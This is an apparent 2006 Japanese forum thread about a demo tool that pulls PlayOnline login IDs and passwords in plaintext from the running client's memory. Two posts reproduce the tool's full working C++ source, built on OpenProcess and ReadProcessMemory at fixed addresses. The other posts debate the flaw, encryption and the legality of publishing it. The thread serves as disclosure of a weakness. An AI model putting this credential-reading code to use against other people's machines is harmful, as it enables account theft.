PlayOnlineのパスワードぶっこ抜きデモが公開

このエントリーをはてなブックマークに追加
1既にその名前は使われています
FF11の板(壺)の便利なツール・ソフトを作るスレ Ver.7で
PlayOnlineのパスワードぶっこ抜きデモがソース付で公開された。
http://yy10.kakiko.com/test/read.cgi/ff11/1156767706/269

http://www.uploda.net/cgi/uploader4/index.php?dlpas_id=0000006286.zip
DLパスワード ff11

以下Readme.txtより
PlayOnlineのパスワードぶっこ抜きデモです。
ログインした状態でPassHacker.exeを実行して下さい。
たった数十行のコードでパスワードを抜かれてしまうセキュリティの甘さ。
これが(おそらくサービス開始当初から)放置され続けていた事実を、あなたはどう思いますか?

! このプログラムはセキュリティ上の危険性を知らせるためのデモであり、
! 罠ツール等作成の手助けをするものではありません。
! 当パッケージから得た情報を元に悪質なプログラムを作成しないで下さい。
! 実行ファイルは付属のソースをVC++2005でコンパイルしたものです。
! 当然ですが、取得した情報を外部に送信するような処理は一切書いていません。
2既にその名前は使われています:2006/10/04(水) 17:12:09.23 ID:/rX6m1yS
俺のPCはネットに繋げてないから安心
3既にその名前は使われています:2006/10/04(水) 17:12:16.61 ID:Z0S4kyxU
よん?
4既にその名前は使われています:2006/10/04(水) 17:12:25.67 ID:sRYqd06p
>>1
5既にその名前は使われています:2006/10/04(水) 17:12:52.24 ID:iROxpSti
>>1 おい!これ使ったら俺のキャラを誰かが勝手に使ってるぞ!!!
6既にその名前は使われています:2006/10/04(水) 17:13:02.86 ID:a5WXGH1n
パソコンが射精した
7既にその名前は使われています:2006/10/04(水) 17:12:58.44 ID:Vjrl5cjb
   /.   ノ、i.|i     、、         ヽ
  i    | ミ.\ヾヽ、___ヾヽヾ        |
  |   i 、ヽ_ヽ、_i  , / `__,;―'彡-i     |
  i  ,'i/ `,ニ=ミ`-、ヾ三''―-―' /    .|
   iイ | |' ;'((   ,;/ '~ ゛   ̄`;)" c ミ     i.
   .i i.| ' ,||  i| ._ _-i    ||:i   | r-、  ヽ、   /    /   /  | _|_ ― // ̄7l l _|_
   丿 `| ((  _゛_i__`'    (( ;   ノ// i |ヽi. _/|  _/|    /   |  |  ― / \/    |  ―――
  /    i ||  i` - -、` i    ノノ  'i /ヽ | ヽ     |    |  /    |   丿 _/  /     丿
  'ノ  .. i ))  '--、_`7   ((   , 'i ノノ  ヽ
 ノ     Y  `--  "    ))  ノ ""i    ヽ
      ノヽ、       ノノ  _/   i     \
     /ヽ ヽヽ、___,;//--'";;"  ,/ヽ、    ヾヽ
8既にその名前は使われています:2006/10/04(水) 17:13:14.99 ID:dGTMGMCR
>>2
次回接続時に自動送信
9既にその名前は使われています:2006/10/04(水) 17:15:13.09 ID:/rX6m1yS
>>8
次回も何もネットに繋げてないから
10既にその名前は使われています:2006/10/04(水) 17:18:04.23 ID:X0bN29iP
コンパイル→ぷよぷよ→カーバンクル

召喚強化の流れは既に出来上がっていたということだったんだよ!!
11既にその名前は使われています:2006/10/04(水) 17:20:43.73 ID:lnMi7QFS
// PassHacker.cpp : コンソール アプリケーションのエントリ ポイントを定義します。
//

#include "stdafx.h"
#include <windows.h>

int _tmain(int argc, _TCHAR* argv[])
{
const wchar_t *lpszWindowName = L"PlayOnline Viewer Ver.1.17.02h";

HWND hPlayOnlineWindow = ::FindWindowW(NULL, lpszWindowName);

DWORD dwPlayOnlineProcessId = NULL;

::GetWindowThreadProcessId(hPlayOnlineWindow, &dwPlayOnlineProcessId);

HANDLE hPlayOnlineProcess = ::OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPlayOnlineProcessId);

if(hPlayOnlineProcess)
{
12既にその名前は使われています:2006/10/04(水) 17:20:57.58 ID:tKjIqz/M
シナチクに利用されるだけだな
13既にその名前は使われています:2006/10/04(水) 17:21:20.01 ID:lnMi7QFS
wchar_t szUsername[16] = {0};
wchar_t szPassword[16] = {0};

::ReadProcessMemory(hPlayOnlineProcess, (LPCVOID)0x00127A62, szUsername, 15 * sizeof(wchar_t), NULL);
::ReadProcessMemory(hPlayOnlineProcess, (LPCVOID)0x001299E8, szPassword, 15 * sizeof(wchar_t), NULL);

::wprintf(L"user: %s\npass: %s\n\n", szUsername, szPassword);
::CloseHandle(hPlayOnlineProcess);

wchar_t dummy;
::wprintf(L"press enter to exit.");
::wscanf_s(L"%c", &dummy);
}

return 0;
}

これだけで抜けちゃうのかよ…
14既にその名前は使われています:2006/10/04(水) 17:21:52.29 ID:ffGvtH7w
セキュリティ甘すぎwwwwwww
15既にその名前は使われています:2006/10/04(水) 17:22:50.47 ID:RcymjAZv
ありゃ入力直下で暗号化処理してないの?
16既にその名前は使われています:2006/10/04(水) 17:24:25.33 ID:SlHjwFmx
メモリ上に平文のまま展開してるらしい

266 名前:(・ω・)[sage] 投稿日:06/10/04(水) 13:22:50 ID:vs8maoiW
ログ処理を暗号化とか考える前に、まずはメモリ上に平文のパスワード置くの止めろと(´Д`)
17既にその名前は使われています:2006/10/04(水) 17:28:02.09 ID:den96JOR
>>1は勿論□eにも報告したんだよな?
18既にその名前は使われています:2006/10/04(水) 17:28:20.09 ID:J2FGkYQe
学生でも作れそうな捨てっぷ数だな
19既にその名前は使われています:2006/10/04(水) 17:28:24.50 ID:pfo8/W/2
>>15

鯖との認証は平文だし
Radius認証、PAPだけでやっているんじゃないかw
20既にその名前は使われています:2006/10/04(水) 17:28:43.63 ID:jAIADc5W
まぁ、今までオフゲ作ってた会社だからな・・・
セキュリティとかのノウハウは0に等しいんだろ
21既にその名前は使われています:2006/10/04(水) 17:29:02.91 ID:sMx0Er1J
http://www.playonline.com/ff11/event/tgs2006/vanafes3.html#enqt
開始予定日時: 10月4日(水) 14:00頃
終了予定日時: 10月5日(木) 14:00頃

ヴァナフェスアンケートを実施中ですが
その中に言語別サーバーに関する項目があります。
公式のアンケートなので要望が高ければ実現するかも?

※参加方法:POLにログイン→FFXIトップページからヴァナフェスアンケートへ

・ゲームやサービスに望むことは何ですか?
□サーバーを言語別に分けてほしい。
↑にチェックを入れ、他のアンケート項目に答えて最下段の確認を押せば登録完了です。
POLで登録出来るので課金してない人も参加してみてはいかがでしょうか?
あのヴァナが日本語で溢れる世界をもう一度!
22既にその名前は使われています:2006/10/04(水) 17:31:23.04 ID:X0bN29iP
全てのパーティに晒しがつきまとうあの頃をもう一度、か
23既にその名前は使われています:2006/10/04(水) 17:31:29.23 ID:TAS6oMTQ
マジ?
24既にその名前は使われています:2006/10/04(水) 17:33:23.09 ID:sRYqd06p
>>21
スレ違い
25既にその名前は使われています:2006/10/04(水) 17:39:23.82 ID:3M3k2oUj
>>11
なんじゃこの難しいプログラムは
C言語の成績A評価のおれが見てもさっぱりわからん
26既にその名前は使われています:2006/10/04(水) 17:43:26.76 ID:4QGG/Qkg
法律よく知らないけどセキュリティが甘いとしても
そのハッキング方法をネット公開したらタイーホされね?
そのアプリ公開したヤツとここにソースをコピペしたヤツ。

方法公開まではセーフ?
27既にその名前は使われています:2006/10/04(水) 17:45:40.86 ID:vhLwJ3eQ
セキュリティの不備を指摘するためにハッキングして逮捕された人いたな
28既にその名前は使われています:2006/10/04(水) 17:47:35.29 ID:JP5iQyNe
> メモリ上に平文のまま展開してるらしい

('x'*)・・・

当時はトロイ・ウィルスの類は想定しなかったてことだね。
29既にその名前は使われています:2006/10/04(水) 17:47:42.20 ID:tVL2tjA5
というか、とっくに直してるもんだと思ってたぞ。
これってかなり前に分かってた事よな。
■eのネ実担当なにしてんの?
ちゃんと報告しないとクビとぶよ?
30既にその名前は使われています:2006/10/04(水) 17:48:52.58 ID:q9fS5hjw
平文でメモリに置きっぱなしにしてるのか?
ハック難易度最低ランクだなそりゃ
31既にその名前は使われています:2006/10/04(水) 17:50:30.77 ID:2+0DkbNJ
パスワード抜くツール入れて、パスワード抜かれました、って、
お前らアホ?
32既にその名前は使われています:2006/10/04(水) 17:52:42.37 ID:jhxSYWYQ
>>25
WindowsのAPIを呼び出してるだけなので難しいプログラムじゃないよ。
33既にその名前は使われています:2006/10/04(水) 17:53:11.95 ID:GgxIYHGZ
http://www.playonline.com/ff11/event/tgs2006/vanafes3.html#enqt
開始予定日時: 10月4日(水) 14:00頃
終了予定日時: 10月5日(木) 14:00頃

ヴァナフェスアンケートを実施中ですが
その中に言語別サーバーに関する項目があります。
公式のアンケートなので要望が高ければ実現するかも?

※参加方法:POLにログイン→FFXIトップページからヴァナフェスアンケートへ

・ゲームやサービスに望むことは何ですか?
□サーバーを言語別に分けてほしい。
↑にチェックを入れ、他のアンケート項目に答えて最下段の確認を押せば登録完了です。
POLで登録出来るので課金してない人も参加してみてはいかがでしょうか?
あのヴァナが日本語で溢れる世界をもう一度!
34既にその名前は使われています:2006/10/04(水) 17:53:16.55 ID:XH6tQSdm
>>31
お前は予防接種にいって病気になって帰ってきそうだな
35既にその名前は使われています:2006/10/04(水) 17:59:07.67 ID:jhxSYWYQ
>>31
ソースの方はパスワードとって表示する処理しか書いてないよ。
手元にコンパイラがないからバイナリ比較できないのでexeは知らん。
36既にその名前は使われています:2006/10/04(水) 17:59:32.11 ID:2+0DkbNJ
>>34
病院でウイルス注射して貰ったらウイルスに感染した!
って言ってるお前らが謎なんだが
真性の馬鹿?
37既にその名前は使われています:2006/10/04(水) 18:01:02.31 ID:BSNRA15D
>>36
>>1がどんな物かわからないヤツは会話に参加するなよ小僧
38既にその名前は使われています:2006/10/04(水) 18:01:42.53 ID:O3Wiujnh
>>2+0DkbNJ

これはひどい
39既にその名前は使われています:2006/10/04(水) 18:02:55.69 ID:4NSSIpHt
>>36
病院行けw
40既にその名前は使われています:2006/10/04(水) 18:03:15.12 ID:iROxpSti
>>11-13

お前何やってんだよ!!!
このすれ見た奴ら全員パスワード抜かれるぞ!!!
41既にその名前は使われています:2006/10/04(水) 18:05:04.55 ID:ffGvtH7w
PS2でやってるから抜かれる心配はなす
42既にその名前は使われています:2006/10/04(水) 18:05:59.98 ID:ptcF+RUD
今まであった罠ツールにこれを組み込んで
シャウトで自分のIDとパスワードを叫ばせることができるツールが
簡単に出来る

とりあえずはツールを使わないことが対策だが
将来的にブラウザなどの脆弱性を利用されて
これを組み込んだプログラムが実行させられる可能性があるのが問題
43既にその名前は使われています:2006/10/04(水) 18:06:12.47 ID:sRYqd06p
>>36
中華に、このセキュリティの甘さを突かれる
パス抜きツールを本格的に作ってばらまかれる前に対処しろって
実際にデモ作って検証してるだけだろう
44既にその名前は使われています:2006/10/04(水) 18:08:08.87 ID:sdHUaR2L
JavaスクリプトやVBScriptで>>11 >>13みたいなことはできる?
45既にその名前は使われています:2006/10/04(水) 18:11:03.98 ID:2+0DkbNJ
ツール使う前提でメモリ見せるなら
平文だろうが暗号化してようがパス抜かれるだろ。アホ?

アンチウイルスの警告無視してウイルス実行するのと同じなんだが
マジで見てて恥ずかしいくらいだw
46既にその名前は使われています:2006/10/04(水) 18:12:44.36 ID:qGnt+X7u
>>44
ローカルならWSH経由で出来る
ネットからはセキュリティホールでも突かない限り実行できんが
47既にその名前は使われています:2006/10/04(水) 18:12:53.47 ID:ptcF+RUD
ツールの作りやすさが違う
48既にその名前は使われています:2006/10/04(水) 18:12:55.70 ID:FXVVbU6z
Cコーデックできるし、俺も脆弱探してみるかな。
それにしてもこんなステップ数でできるのかw
49既にその名前は使われています:2006/10/04(水) 18:14:34.97 ID:BSNRA15D
>>45が本物だって事はわかった
50既にその名前は使われています:2006/10/04(水) 18:16:49.56 ID:2+0DkbNJ
>>47
暗号文送ってから解析しても良いから手間は同じ
つかキー入力直接吸えばいいだけじゃん
ウイルス実行して感染した!とかアホとしか
51既にその名前は使われています:2006/10/04(水) 18:18:08.14 ID:sdHUaR2L
>>46
じゃあ少しは安心か(・ω・)
52既にその名前は使われています:2006/10/04(水) 18:19:49.14 ID:bEKy5Qtg
http://www.playonline.com/ff11/event/tgs2006/vanafes3.html#enqt
開始予定日時: 10月4日(水) 14:00頃
終了予定日時: 10月5日(木) 14:00頃

ヴァナフェスアンケートを実施中ですが
その中に言語別サーバーに関する項目があります。
公式のアンケートなので要望が高ければ実現するかも?

※参加方法:POLにログイン→FFXIトップページからヴァナフェスアンケートへ

・ゲームやサービスに望むことは何ですか?
□サーバーを言語別に分けてほしい。
↑にチェックを入れ、他のアンケート項目に答えて最下段の確認を押せば登録完了です。
POLで登録出来るので課金してない人も参加してみてはいかがでしょうか?
あのヴァナが日本語で溢れる世界をもう一度!
53既にその名前は使われています:2006/10/04(水) 18:21:27.09 ID:nSkwmZKo
>>1のプログラムって、ただユーザーネームとパス抜いて表示させるだけだよね?
54既にその名前は使われています:2006/10/04(水) 18:21:43.36 ID:4NSSIpHt
>暗号文送ってから解析しても良いから手間は同じ
だから暗号化しないってのは常識を疑うねって話じゃね
55既にその名前は使われています:2006/10/04(水) 18:22:22.49 ID:7gpRB/dO
平文でメモリに置いてるってジラの頃から言われてたよな

>>36
C型肝炎でぐぐれ
56既にその名前は使われています:2006/10/04(水) 18:23:35.41 ID:hyhjeSsZ
>>53
うむ、pol.exeのメモリ空間からIDとパスを拾って表示してるだけ
ソースを見る限りではな
57既にその名前は使われています:2006/10/04(水) 18:24:15.10 ID:k+1rCbyQ
ま、俺も>>45>>50が正論だとは思うが、修正しなきゃならないかもなー開発ちーむwも余計な手間が増えたんじゃないの?
58既にその名前は使われています:2006/10/04(水) 18:25:22.86 ID:jhxSYWYQ
平文で入ってるんだったら他のデータもそのまんま入ってるんだろうから、
アクション起こす毎にプロセスメモリダンプしてったら丸裸にされる勢いだね。
ここまでとはおもわなかったよ。
そりゃツールを誰でも作れるわけだw
Windowsのプロセスを少しでもかじった事のある人間なら
誰でもツール作れるんじゃないの?
59既にその名前は使われています:2006/10/04(水) 18:25:59.79 ID:hyhjeSsZ
つーかよく今までこれを利用した罠シャウトが出なかったもんだな・・・
60既にその名前は使われています:2006/10/04(水) 18:26:01.83 ID:ptcF+RUD
ID:2+0DkbNJは>>1のファイルを実行した人の話をしてるようだ
61既にその名前は使われています:2006/10/04(水) 18:26:07.40 ID:nSkwmZKo
>>56
だよねー
何かウィルスだウィルスだって騒いでる人いるから、ちょっと不安になったww
62既にその名前は使われています:2006/10/04(水) 18:28:24.16 ID:qGnt+X7u
>>59
リアルで捕まるからwwwww
63既にその名前は使われています:2006/10/04(水) 18:28:33.86 ID:BSNRA15D
>>61
騒いでるのは釣り以外一人だけだけどなw
64既にその名前は使われています:2006/10/04(水) 18:28:44.24 ID:NqTN9+X1
>>57
携帯から自演乙w
65既にその名前は使われています:2006/10/04(水) 18:29:00.50 ID:v3sLIdgD
知識の無い奴からすりゃ「ウィルス」ってのは魔法の言葉でさ
それ使えば説明できてると勘違いしてるだけなんだから
そうガミガミしてやんなよ
66既にその名前は使われています:2006/10/04(水) 18:30:13.03 ID:7gpRB/dO
>>61
ぶっこぬかれたとか勝手に動いてるとか言ってる連中が
本当にぶっこぬかれてたらそれはそれで驚きだ
67既にその名前は使われています:2006/10/04(水) 18:30:37.46 ID:sdHUaR2L
>>62
シャウトされたパスを使って不正アクセスした奴はアウトだけど
ツール作った奴もアウトなのか?
68既にその名前は使われています:2006/10/04(水) 18:30:45.82 ID:k+1rCbyQ
>>64
スマン、携帯からでもないし自演でもないぞ
アンカーミスか
69既にその名前は使われています:2006/10/04(水) 18:31:56.16 ID:BSNRA15D
70既にその名前は使われています:2006/10/04(水) 18:32:44.62 ID:v3sLIdgD
>>67
一応外部ツールではある罠
banかどうかは□の判断だが
71既にその名前は使われています:2006/10/04(水) 18:32:57.82 ID:hyhjeSsZ
>>67
なるんじゃないか?パスワードって時点でヤバイし、
それを他人に使わせるよう仕向けたようなもんだから。
72既にその名前は使われています:2006/10/04(水) 18:33:34.75 ID:Aqrf1JXW
パスワード忘れたときに便利だな
メールのパスワードも抜けないかな?
忘れたからPOLのメール読めないんだよ
73既にその名前は使われています:2006/10/04(水) 18:35:51.05 ID:sdHUaR2L
ああ、これにあたるな
セキュリティ用語事典[不正アクセス禁止法]
http://www.atmarkit.co.jp/aig/02security/unlawfulaccess.html

また特定のアクセス制御を有する端末に関しての、認証情報(ID・パスワードなど)をその
端末利用者や管理者以外の人間に漏らしたり流布してはいけない、ということも規定され
ており、これは「不正アクセスを助長する行為」として犯罪とされ、本法により罰せられる。 
この場合の刑は30万円以下の罰金刑である。

74既にその名前は使われています:2006/10/04(水) 18:36:19.84 ID:tw51rbjb
>>72

サポートに電話すれば教えてくれるよ
75既にその名前は使われています:2006/10/04(水) 18:38:24.35 ID:hyhjeSsZ
まあどうでもいいけど、これは早く直して欲しいね
ここで迅速に修正したらちょっとは株上がるかもよ>■
76既にその名前は使われています:2006/10/04(水) 18:43:47.77 ID:bfe9mT8T
ジラート時点で判明してるのに(本来なら開発段階で潰してて当然)
今更ネ実で晒されてから迅速に対処して株が上がるって面白い発言ですね
77既にその名前は使われています:2006/10/04(水) 18:48:37.80 ID:h2knBMfW
脆弱性を自らネ実で公開
→即時対応
→■<タスクチームの威力です

・・・マッチポンプ?
78既にその名前は使われています:2006/10/04(水) 18:56:19.84 ID:ujNXUY7Q
PS2って勝ち組じゃね?
79既にその名前は使われています:2006/10/04(水) 18:56:48.84 ID:Uc+Om82l
試しに動かしてみたら本当に表示されたのでage
80既にその名前は使われています:2006/10/04(水) 18:57:12.96 ID:2+0DkbNJ
キー入力をそのまま出力するツールがあれば(あるが)、
「IDからPASSまで全て丸裸!Windowsの脆弱性だ!」とか言うの?お前ら
真面目にこのレベルの話なんだが
81既にその名前は使われています:2006/10/04(水) 18:57:23.11 ID:q9fS5hjw
そもそも簡単にプロセス境界をまたげるのが問題なんだよな
そんな必要あるのデバッガかハックツールぐらいなもんじゃん
82既にその名前は使われています:2006/10/04(水) 18:57:35.38 ID:vCVibSgH
おk、無駄(?)な改行入れて36行ほどでPOLのIDとpass抜けるってMMO研究所に書いてくる。
83既にその名前は使われています:2006/10/04(水) 18:58:35.91 ID:kx5h3WAA
   /.   ノ、i.|i     、、         ヽ  
  i    | ミ.\ヾヽ、___ヾヽヾ        |    | | |   |    ̄ ̄||. ‐┬‐
  |   i 、ヽ_ヽ、_i  , / `__,;―'彡-i     |    |\  | ̄ ̄|  ̄|. ̄  ―┼―
  i  ,'i/ `,ニ=ミ`-、ヾ三''―-―' /    .|.    l      /  /      |_
   iイ | |' ;'((   ,;/ '~ ゛   ̄`;)" c ミ     i.   
   .i i.| ' ,||  i| ._ _-i    ||:i   | r-、  ヽ、   /    /   /  | _|_ ― // ̄7l l _|_
   丿 `| ((  _゛_i__`'    (( ;   ノ// i |ヽi. _/|  _/|    /   |  |  ― / \/    |  ―――
  /    i ||  i` - -、` i    ノノ  'i /ヽ | ヽ     |    |  /    |   丿 _/  /     丿
  'ノ  .. i ))  '--、_`7   ((   , 'i ノノ  ヽ
 ノ     Y  `--  "    ))  ノ ""i    ヽ
      ノヽ、       ノノ  _/   i     \
     /ヽ ヽヽ、___,;//--'";;"  ,/ヽ、    ヾヽ
84既にその名前は使われています:2006/10/04(水) 18:58:53.13 ID:vCVibSgH
>>80
良く分からないけどPOLに覚えさせてるのをキー入力を必要とせずに抜けるんじゃないの?
85既にその名前は使われています:2006/10/04(水) 19:04:05.72 ID:2+0DkbNJ
>>84
当たり前だろ
PCに記憶させてんだから
認証するにはメモリーに展開するわ
暗号化したらどうなるってわけでも無いんだが
PAR使えばチートできるのと原理は同じ
86既にその名前は使われています:2006/10/04(水) 19:06:24.20 ID:ffGvtH7w
ネ実って結構頭いい奴多いんだな、俺にはなんの事かさっぱりだ
87既にその名前は使われています:2006/10/04(水) 19:08:44.58 ID:Uc+Om82l
>>85
暗号化させてたらどうにかなるんじゃないの?
88既にその名前は使われています:2006/10/04(水) 19:10:56.96 ID:sdHUaR2L
268 名前:(・ω・)[sage] 投稿日:06/10/04(水) 15:08:38 ID:UqUNobG1
ログを暗号化しても、復号する関数をhookすればいいんですが。
89既にその名前は使われています:2006/10/04(水) 19:22:21.04 ID:vCVibSgH
ID:2+0DkbNJ とまともに話せないと思ったほうがよさげ?
90既にその名前は使われています:2006/10/04(水) 19:24:06.76 ID:hyhjeSsZ
付箋紙にパスワード書いてモニタに貼っておくようなもんじゃないかね
近づかなきゃ見えないとはいえ、見ようと思えば周囲の人間からもバッチリ見える
いくらなんでも無用心すぎるから、せめて机にしまわないか?っていう
91既にその名前は使われています:2006/10/04(水) 19:26:07.48 ID:o7j38pHA
ID:2+0DkbNJ
92既にその名前は使われています:2006/10/04(水) 19:38:50.93 ID:db2d6dOs
>>ID:2+0DkbNJ
>>88
93既にその名前は使われています:2006/10/04(水) 19:48:46.72 ID:zAmtFUZu
結局、このスレ何がしたいのか分からん
94既にその名前は使われています:2006/10/04(水) 19:52:21.49 ID:fFf10pdK
DWORDにNULLいれんのが気にいらねえええええええええええええええええええええええええええええ
95既にその名前は使われています:2006/10/04(水) 19:53:16.97 ID:peYyPlNe
まだ直してなかったのかよ、この不具合
96既にその名前は使われています:2006/10/04(水) 19:56:36.35 ID:SEu15w+0
こんなことより>>1よ聞いてくれ。
ヴァナフェスのアンケートしてるんだけどさぁ・・・
あなたが所持してるLS数の選択があるんだよ。

でもな、 所 持 し て い な い

の項目がないんだよ。
無視してすすめると、最後に↑の選択ができてません、ってでて
アンケート終了できないんだよ。
オレはどうすればいい?
97既にその名前は使われています:2006/10/04(水) 19:58:57.46 ID:r3zozLJ0
N U L L - P O
98既にその名前は使われています:2006/10/04(水) 20:02:44.58 ID:bkyHmcV6
なにこの逮捕者続出しそうな糞スレは

たくさん逮捕されるといいですね^^^^^^^^^^^^^
99既にその名前は使われています:2006/10/04(水) 20:04:57.29 ID:LcGnObOt
>>86
安心しろ、少なくともここはアホばっかだ
100既にその名前は使われています:2006/10/04(水) 20:05:31.76 ID:peYyPlNe
>>96
嘘ついて1とか書いとけばいいんじゃね?
どーせわからんよ
101既にその名前は使われています:2006/10/04(水) 20:18:46.04 ID:CYwcbXhT
POLのバージョンアップでオフセットがずれるとそのままでは動かなくなるだろうけど、
いたちごっこだろうなぁ。
メモリからとってきてるので、ログインしていることが条件になってるんだな。ファイルか
レジストリにも記憶してるはずだけど、そっちはいまのとこ解析されてないのかな?
まあ時間の問題のような気がするが
102既にその名前は使われています:2006/10/04(水) 20:29:32.60 ID:RNUskw2t
誰か民明書房的に説明してくれ
103既にその名前は使われています:2006/10/04(水) 20:30:17.90 ID:4IntEJ4X
>>96
一人LS作ればいいじゃない
104既にその名前は使われています:2006/10/04(水) 20:38:26.97 ID:NtioQjMp
>>43
かなり前から中華が罠サイトでやってる。
前にもあったろ?なんとかの雫とかいうサイトにアクセスするとWindowsのセキュ穴使って
コード送り込んで、POLの垢とパスを特定サイトに送りつけるって事件が。

いまあっちこっちでツール配布の振りして中華サイトのexeファイル直リン張ってるのがいるが、
それも同様の罠が入ってる可能性が非常に高い。
105既にその名前は使われています:2006/10/04(水) 20:42:29.01 ID:vCVibSgH
>>104
にもかかわらず◇eはPoL狙い撃ちされてます、って言うのを公表してないんだよね。
本当に糞ったれな企業だよ、まったく。
106既にその名前は使われています:2006/10/04(水) 20:47:09.17 ID:mzPuoiCr
一番危ないのが例のAH検索サイトとFFレシピ
107既にその名前は使われています:2006/10/04(水) 20:49:21.23 ID:G75Dbq9z
■e<ユーザーがパス抜かれようが知ったこっちゃない
108既にその名前は使われています:2006/10/04(水) 20:50:13.10 ID:17nsJtH1
>>103
奇才あらわる
その考えは思いつかんかった
109既にその名前は使われています:2006/10/04(水) 22:56:45.75 ID:sRYqd06p
>>96
後で嘘にならないように一人LS作った
110既にその名前は使われています:2006/10/05(木) 00:54:33.94 ID:XZzjaejR
神!
自分のパス忘れて新しくパソコンでFF出来なく
しょうがなく古いパス記憶してある方の低性能パソコン使ってたけど、このツールでパスわかったwww
やっと高性能パソコンに移行できるぜ

ありがとう!このツール作った人!
111既にその名前は使われています:2006/10/05(木) 00:57:32.69 ID:F3VcQaOD
FFRecipeはRMT会社に買われたからな。
いつやられるかまじやヴぁい
112既にその名前は使われています:2006/10/05(木) 01:08:14.42 ID:GexXV2kg
>>88
あのなあ、復号をサーバでやればいいだけの話だろ?
アホか?
113既にその名前は使われています:2006/10/05(木) 01:11:43.13 ID:GBMzfT6E
>>112
馬鹿?
ならその暗号をそのままサーバに渡すだけ。

PCの中自由に見られる時点で終わってるの。わかる?
114既にその名前は使われています:2006/10/05(木) 01:14:24.45 ID:k2qYItJK
例え他人のパスわかっても不正アクセスとして捕まるんじゃねーか?

匿名プロキシ通してアクセスできるツールもあるのかもしれんが、
絶対に足はつくだろう。
115既にその名前は使われています:2006/10/05(木) 01:17:48.22 ID:bsyu1ljN
でもさ、よく考えたらPOL起動した状態で外部プログラムを起動する状況って無いよな?
真っ当なプレイヤーなら、POL起動してそのまますぐFF起動するんじゃね?
ブッコ抜きプログラムはPOLより先に起動してたら抜けないだろ。
心配する必要があるのは窓化してる人だけだろ。

これよりも、レジストリから盗むタイプのが何倍も危険だと思うが。
116既にその名前は使われています:2006/10/05(木) 01:18:05.68 ID:GBMzfT6E
>>114
>例え他人のパスわかっても不正アクセスとして捕まるんじゃねーか?
当たり前だろ。

今回のツールはメモリ上のものを表示するだけのツールだから、
ぶっちゃけ何がしたいのか、 何が凄いのか、
全くわからないけどな。

他人がそのファイルを実行してくれるなら、
どんなウイルスだろうが仕込めるに決まってるだろ。
117既にその名前は使われています:2006/10/05(木) 01:20:48.82 ID:GexXV2kg
>>113
ええと、複合化の鍵をPC固有のものにすれば、盗まれても関係ないと
思うのですが?
何か間違ってます?
118既にその名前は使われています:2006/10/05(木) 01:21:54.91 ID:7/bXMhXN
>>115
PC起動〜POL起動の間の時点で外部プログラムが勝手にこっそり起動してたらどーすんの?
119既にその名前は使われています:2006/10/05(木) 01:22:18.74 ID:X6+hRx+M
>>114
中国からの不正アクセスじゃ日本の警察には捕まらねえけどなwwwwwwwwwwwwwww
120既にその名前は使われています:2006/10/05(木) 01:24:43.31 ID:q5wTR5NB
>>111
買った先がRMT会社のソースきぼん。ちょっと某ブログ更新してくる。
121既にその名前は使われています:2006/10/05(木) 01:25:19.46 ID:GBMzfT6E
>>117
前提としてPCの中身が自由に触れるんだから、
そのPCのキーだって取り出せるし、
普段のキー入力を全て保存しておいて後で解析してもいい。

「ウイルスを実行したらパスが抜けた!」って言ってる奴多いけど。


   当   た   り   前

わかりますか?
122既にその名前は使われています:2006/10/05(木) 01:27:31.30 ID:7/bXMhXN
このテのスレの「地雷踏んだら爆発した!」発言のうちで実際踏んだ奴ってどんくらいいるんだろ
123既にその名前は使われています:2006/10/05(木) 01:28:53.66 ID:GBMzfT6E
つーか他人のPCに自由にツールが仕込めて、
それを馬鹿みたいに実効してくれるなら、

FF起動からの一連の動作をマクロ化したツールでも仕込めばいいじゃん。
何でもアリだ。
124既にその名前は使われています:2006/10/05(木) 01:28:54.76 ID:GexXV2kg
>>121
いや、複合化鍵は盗まれてもかまわない。
どうやってその複合化鍵を生成するルーチンを解析するんだい?
PC固有のものだからほかのPCから送信しても無理なように作るぞ?
125既にその名前は使われています:2006/10/05(木) 01:31:57.12 ID:GBMzfT6E
>>124
公開鍵暗号みたいなもの全てに仕込んでもいいけどよ。
それ以前に全てが自由に触れるだろ?
そもそもプラットフォームに寄らずIDとパスだけで遊べるゲームなのよ。
わかりますか?
わかんねーかな。

アホ。
126既にその名前は使われています:2006/10/05(木) 01:34:26.52 ID:3bHc7ALu
>>120
ffrecipeサイト売却か??
ttp://jbbs.livedoor.jp/bbs/read.cgi/game/6954/1150873573/

もっと詳しくはネ実に立っていたスレの方がいいんだが、言うまでもなくもう落ちてる
>>120がffrecipe売却まとめサイトの中の人ならそれ以上に新しい情報は無いよ
127既にその名前は使われています:2006/10/05(木) 01:38:05.33 ID:GexXV2kg
>>125
全てが自由に触れるだろうというのは果たしてどうだろう。
まあ、今の作りがお粗末なだけで、ちゃんと考えて作れば
少々のことIDとPASSがだだ漏れにはならないとは思うが。
128既にその名前は使われています:2006/10/05(木) 01:42:18.67 ID:GBMzfT6E
>>127
駄々漏れも何も、最初から他人には見えない情報だ。
「これが他人に実行されたら!」なんてのは、
その他人に実行される環境の問題だし、
それが成立する前提ならPCの中でやれないことは何も無い。

暗号化したらどうなるんだよ。
全く何の対策にもならず、全く無意味な手間が増えるだけだ。
銀行の貸し金庫の中のものを更に金庫に入れて、
さらにその中の金庫に隠して意味があるかって話。

普段は手間が増えるだけだし。
金庫そのものを盗まれたら全く無意味。
129既にその名前は使われています:2006/10/05(木) 01:47:09.06 ID:q5wTR5NB
>>126
売却の話は知ってたけど買ったのはそこなのかー。ちなみに俺は例のアンチRMTの人。
今まで触れたのはあくまでゲーム内の事だけだが、これは書く価値ありそう。
130既にその名前は使われています:2006/10/05(木) 01:49:15.45 ID:pgTA2ggH
馬鹿はどれだけ対策しても、洩らす時は洩らすからな。
あとは対策コストに見合うだけの効果を得られるかどうかだな。
そもそもネットワークに繋がっているという事はそれだけのリスクが常にあるという事。
131既にその名前は使われています:2006/10/05(木) 01:49:31.36 ID:GexXV2kg
>>128
暗号化は手間が増えると言っても、プログラム的に手間が少々増えるだけで
ユーザには全く影響のないこと。
仮に金庫の中にお宝の地図が入っていたとして、それが99..999999999999%の
確率で開けられないものであれば、盗んだ奴は中身が見れないわけで、
盗まれてもあまり意味はないのではないかな?
132既にその名前は使われています:2006/10/05(木) 02:01:13.36 ID:GBMzfT6E
>>131
アホか。ループさせんな。
サーバに暗号化されたまま送るならそのままでいいし、
内部的に復号させるならen/decrypt処理をnopするだけだ。

そもそも99.999999999999%って。
暗号ですらねえよこの程度。
133既にその名前は使われています:2006/10/05(木) 02:03:23.78 ID:ls7GkMm4
ffrecipe売却まとめサイト
http://ffrecipe.jugem.jp/
